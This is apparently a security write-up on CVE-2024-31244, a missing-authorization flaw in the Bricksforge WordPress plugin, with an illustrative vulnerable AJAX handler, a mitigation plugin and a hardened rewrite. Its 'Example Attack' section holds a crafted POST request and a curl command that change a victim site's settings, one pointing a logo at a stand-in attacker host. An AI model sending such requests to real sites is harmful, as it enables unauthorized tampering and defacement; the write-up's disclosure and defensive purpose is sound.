In May 2024, a critical security hole, CVE-2024-31244, was discovered in the popular WordPress plugin, Bricksforge, up to and including version 2..17. This flaw allows attackers to perform unauthorized actions due to missing authorization checks. Below, we walk you through exactly what’s affected, the potential impact, and practical exploit examples.

What is Bricksforge?

Bricksforge is a toolkit that extends the Bricks Builder for WordPress, allowing users to enhance website functionality without writing much code. Due to its ease-of-use, it’s popular among both developers and non-technical site owners.

What’s the Bug? (CVE-2024-31244)

A *missing authorization* vulnerability means that the plugin does not check whether the requesting user actually has permission before it performs a privileged action. Without that check, anyone who can reach the relevant function or endpoint can misuse it.

> Vulnerable: Bricksforge from earliest releases until 2..17

Patched:
No patch as of June 2024. (Refer to official changelog for any updates.)

Vulnerable Code Deep-Dive

Here is a simplified code snippet that shows the type of issue present in Bricksforge. This is not the actual source, but an illustration based on advisory details:

function bricksforge_custom_save() {
  // MISSING: No verification of user permissions here
  if(isset($_POST['payload'])) {
    $data = $_POST['payload'];
    // Action: save settings, change site elements, etc.
    update_option('bricksforge_settings', $data);
    echo 'Saved!';
  }
}
add_action('wp_ajax_bricksforge_custom_save', 'bricksforge_custom_save');

What’s wrong?
Anyone who is logged in (or in some cases, anyone at all) can POST to the bricksforge_custom_save AJAX endpoint and change critical settings, since there’s no check like current_user_can('manage_options') or a security nonce.

Exploiting CVE-2024-31244: Example Attack

An attacker can easily exploit this flaw if they know or guess the vulnerable AJAX action name.

Send a crafted POST request:

POST /wp-admin/admin-ajax.php?action=bricksforge_custom_save
Content-Type: application/x-www-form-urlencoded

payload={"site_name": "Hacked by attacker", "theme_color": "red"}

> Any critical settings can be changed depending on what the payload can touch.

Using curl

curl -X POST "https://victim-site.com/wp-admin/admin-ajax.php?action=bricksforge_custom_save" \
  -d 'payload={"site_name":"Hacked!","logo_url":"https://attacker.site/logo.png"}' \
  -b "wordpress_logged_in_cookie_here"

Impact:

- Attackers can pivot to gain higher privileges (for example, by enabling custom code blocks).
- Threats include defacement, *malware installation*, and further attacks on site visitors.

How to Fix

Temporary Mitigation:

- Restrict site user registrations.
- Use a firewall plugin to restrict access to /wp-admin/admin-ajax.php only to trusted users.
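The two interim measures above can be complemented by a small must-use plugin that refuses the vulnerable AJAX action for anyone without the `manage_options` capability before the plugin's own handler runs. The following is an added example written for this write-up, not Bricksforge code or an official release; the guarded action name reuses the illustrative `bricksforge_custom_save` from the snippet above and is an assumption, so replace it with the action names your installed version actually registers.

```php
<?php
/**
 * Plugin Name: Bricksforge AJAX guard (interim mitigation)
 * Description: Added example, not part of Bricksforge. Place this file in
 * wp-content/mu-plugins/ so it loads before regular plugins. It blocks the
 * guarded admin-ajax.php actions for users lacking manage_options until a
 * patched plugin version is available.
 */

// Assumption: action names to restrict. 'bricksforge_custom_save' is the
// illustrative name used in this write-up, not a confirmed plugin action.
const BRICKSFORGE_GUARDED_ACTIONS = array( 'bricksforge_custom_save' );

function bricksforge_guard_admin_ajax() {
    // Only inspect requests that go through admin-ajax.php.
    if ( ! wp_doing_ajax() ) {
        return;
    }

    $action = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '';
    if ( ! in_array( $action, BRICKSFORGE_GUARDED_ACTIONS, true ) ) {
        return;
    }

    // Enforce the authorization check the vulnerable handler lacks.
    if ( ! current_user_can( 'manage_options' ) ) {
        $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
        // Record the refused attempt so it can be picked up by log monitoring.
        error_log( sprintf(
            'bricksforge guard: blocked action=%s user_id=%d ip=%s',
            $action,
            get_current_user_id(),
            $ip
        ) );
        // Stops execution here; the wp_ajax_{action} hook is never reached.
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }
}

// admin-ajax.php fires admin_init before dispatching wp_ajax_{action} or
// wp_ajax_nopriv_{action}, so this runs ahead of any plugin handler for both
// logged-in and anonymous callers.
add_action( 'admin_init', 'bricksforge_guard_admin_ajax' );
```

Because the guard keys on the `action` parameter rather than on a specific callback, it covers both the logged-in and the anonymous dispatch paths of admin-ajax.php, and it can be removed as soon as a fixed Bricksforge release is installed.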

Permanent Solution:

- Update Bricksforge immediately once a fixed version is available.
- Monitor the changelog and WordPress plugins page for releases.
- Audit other plugins for missing authorization checks.

Developer Best Practice:

Always use authorization checks in custom AJAX and form handlers:

if (!current_user_can('manage_options')) {
  wp_die('Not allowed');
}
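To show how the capability check, a nonce check, and input validation fit together, here is a hardened rewrite of the illustrative `bricksforge_custom_save` handler from earlier on this page. It is an added example for this write-up, not Bricksforge's actual code; the action name, the `bricksforge_settings` option, the `_ajax_nonce` field and the three accepted settings keys are assumptions chosen to match the earlier snippet.

```php
<?php
// Added example (not Bricksforge's code): hardened version of the illustrative
// bricksforge_custom_save handler. Action name, option name and accepted keys
// are assumptions for illustration only.

function bricksforge_custom_save_hardened() {
    // 1. Authorization: only users allowed to manage site options may proceed.
    //    This is the check the vulnerable version omits entirely.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }

    // 2. CSRF protection: the request must carry a nonce minted for this
    //    action. The form that submits here creates it with
    //    wp_create_nonce( 'bricksforge_custom_save' ) and sends it as
    //    '_ajax_nonce'. check_ajax_referer() dies on mismatch.
    check_ajax_referer( 'bricksforge_custom_save', '_ajax_nonce' );

    // 3. Input validation: decode the payload and keep only known keys with
    //    sanitized values, instead of storing the raw POST body.
    $raw     = isset( $_POST['payload'] ) ? wp_unslash( $_POST['payload'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( array( 'message' => 'Invalid payload' ), 400 );
    }

    // Whitelist of accepted settings and how each value is cleaned.
    $allowed = array(
        'site_name'   => 'sanitize_text_field',
        'logo_url'    => 'esc_url_raw',
        // Colors must be a 6-digit hex value; anything else is dropped.
        'theme_color' => function ( $value ) {
            return preg_match( '/^#[0-9a-fA-F]{6}$/', $value ) ? strtolower( $value ) : null;
        },
    );

    $clean = array();
    foreach ( $allowed as $key => $sanitizer ) {
        if ( isset( $decoded[ $key ] ) && is_string( $decoded[ $key ] ) ) {
            $value = call_user_func( $sanitizer, $decoded[ $key ] );
            if ( null !== $value && '' !== $value ) {
                $clean[ $key ] = $value;
            }
        }
    }

    update_option( 'bricksforge_settings', $clean );
    wp_send_json_success( array( 'saved' => array_keys( $clean ) ) );
}

// Registered for logged-in users only. There is deliberately no
// wp_ajax_nopriv_ variant, so anonymous requests never reach the handler.
add_action( 'wp_ajax_bricksforge_custom_save', 'bricksforge_custom_save_hardened' );
```

Ordering matters: the capability check comes first so that an unauthorized caller learns nothing about nonce validity, and the nonce check comes before any parsing of untrusted input so that a forged cross-site request is rejected before it can influence state.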

Conclusion

CVE-2024-31244 underlines how critical authorization checks are in WordPress plugin development. If you’re running Bricksforge up to 2..17, patch or disable it urgently to protect your site. Stay tuned to trusted sources and always keep plugins up to date.

Timeline

Published on: 06/09/2024 12:15:09 UTC
Last modified on: 06/10/2024 02:52:08 UTC